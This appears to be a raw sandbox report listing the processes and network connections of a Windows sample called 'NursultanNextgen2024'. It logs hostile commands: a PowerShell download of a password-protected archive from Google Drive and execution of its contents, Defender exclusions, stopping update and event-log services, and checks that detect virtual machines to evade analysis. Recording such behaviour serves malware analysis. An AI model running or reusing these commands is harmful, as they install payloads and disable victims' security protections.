C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get manufacturer /value
C:\Windows\system32\findstr.exe
findstr /i "echo" "C:\Users\Admin\Desktop\NursultanNextgen2024\start.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
C:\Windows\system32\wscript.exe
wscript /b
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1ZRO0JMVWlqdCkDiMau3Ea7O_ARtuQLab&export=download', 'C:\Users\Admin\AppData\Local\Temp\Cache.rar')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -c "Write-Host -NoNewLine $null"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\unrar.exe" x -pNb845nh994nbnj67h45h6 -o+ "C:\Users\Admin\AppData\Local\Temp\Cache.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe"
C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe
"C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe"
C:\Windows\system32\timeout.exe
timeout 0
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\doskey.exe
doskey ASSOC=ENDLOCAL
C:\Windows\system32\timeout.exe
timeout /T 10 /NOBREAK
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "Micro"
C:\ProgramData\soft\regedit.exe
C:\ProgramData\soft\regedit.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\doskey.exe
doskey /listsize=0
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe"
C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\Desktop\NursultanNextgen2024\rar\UnRAR.exe"
C:\Users\Admin\Desktop\UnRAR.exe
"C:\Users\Admin\Desktop\UnRAR.exe"
C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 22.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| GB | 216.58.204.74:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 6.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| GB | 216.58.213.6:443 | static.doubleclick.net | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.200.46:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | tcp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| GB | 172.217.16.225:443 | lh3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-5hne6nzy.googlevideo.com | udp |
| GB | 216.58.204.74:443 | jnn-pa.googleapis.com | udp |
| NL | 172.217.132.169:443 | rr4---sn-5hne6nzy.googlevideo.com | tcp |
| US | 8.8.8.8:53 | 169.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr1---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.198:443 | rr1---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | 198.132.217.172.in-addr.arpa | udp |
| NL | 172.217.132.169:443 | rr4---sn-5hne6nzy.googlevideo.com | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | rr3---sn-5hnekn76.googlevideo.com | udp |
| NL | 209.85.226.8:443 | rr3---sn-5hnekn76.googlevideo.com | udp |
| US | 8.8.8.8:53 | 8.226.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr1---sn-5hnekn7l.googlevideo.com | udp |
| NL | 74.125.100.6:443 | rr1---sn-5hnekn7l.googlevideo.com | udp |
| US | 8.8.8.8:53 | 6.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr1---sn-5hnednsz.googlevideo.com | udp |
| NL | 74.125.8.230:443 | rr1---sn-5hnednsz.googlevideo.com | udp |
| US | 8.8.8.8:53 | 230.8.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-5hne6nzk.googlevideo.com | udp |
| NL | 172.217.132.137:443 | rr4---sn-5hne6nzk.googlevideo.com | udp |
| US | 8.8.8.8:53 | 137.132.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr4---sn-5hnekn76.googlevideo.com | udp |
| US | 8.8.8.8:53 | 200.132.217.172.in-addr.arpa | udp |
| NL | 209.85.226.9:443 | rr4---sn-5hnekn76.googlevideo.com | udp |
| US | 8.8.8.8:53 | 9.226.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr3---sn-5hne6nz6.googlevideo.com | udp |
| NL | 74.125.100.200:443 | rr3---sn-5hne6nz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 200.100.125.74.in-addr.arpa | udp |
| NL | 172.217.132.198:443 | rr1---sn-5hnednss.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr2---sn-5hne6nzd.googlevideo.com | udp |
| NL | 74.125.100.231:443 | rr2---sn-5hne6nzd.googlevideo.com | udp |
| US | 8.8.8.8:53 | 231.100.125.74.in-addr.arpa | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | udp |
| US | 192.178.49.163:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 163.49.178.192.in-addr.arpa | udp |
| US | 192.178.49.163:443 | beacons.gvt2.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 74.125.100.200:443 | rr3---sn-5hne6nz6.googlevideo.com | udp |
| NL | 209.85.226.9:443 | rr4---sn-5hnekn76.googlevideo.com | udp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| NL | 74.125.8.230:443 | rr1---sn-5hnednsz.googlevideo.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | rr3---sn-5hneknee.googlevideo.com | udp |
| NL | 74.125.8.72:443 | rr3---sn-5hneknee.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr5---sn-5hne6nzd.googlevideo.com | udp |
| NL | 74.125.100.234:443 | rr5---sn-5hne6nzd.googlevideo.com | udp |
| US | 8.8.8.8:53 | 72.8.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.100.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rr4---sn-5hne6nz6.googlevideo.com | udp |
| NL | 74.125.100.201:443 | rr4---sn-5hne6nz6.googlevideo.com | udp |
| US | 8.8.8.8:53 | 201.100.125.74.in-addr.arpa | udp |
| NL | 172.217.132.198:443 | rr1---sn-5hnednss.googlevideo.com | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 142.250.187.194:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.46:443 | www.youtube.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | disk.yandex.ru | udp |
| RU | 87.250.250.50:443 | disk.yandex.ru | tcp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| US | 8.8.8.8:53 | docviewer.yandex.ru | udp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 87.250.251.119:443 | mc.yandex.ru | tcp |
| RU | 77.88.21.148:443 | docviewer.yandex.ru | tcp |
| US | 8.8.8.8:53 | 50.250.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.131.154.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.251.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.21.88.77.in-addr.arpa | udp |
| RU | 87.250.250.50:443 | disk.yandex.ru | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 77.88.55.88:443 | yandex.ru | tcp |
| RU | 77.88.55.88:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | avatars.mds.yandex.net | udp |
| US | 8.8.8.8:53 | ads.adfox.ru | udp |
| US | 8.8.8.8:53 | 88.55.88.77.in-addr.arpa | udp |
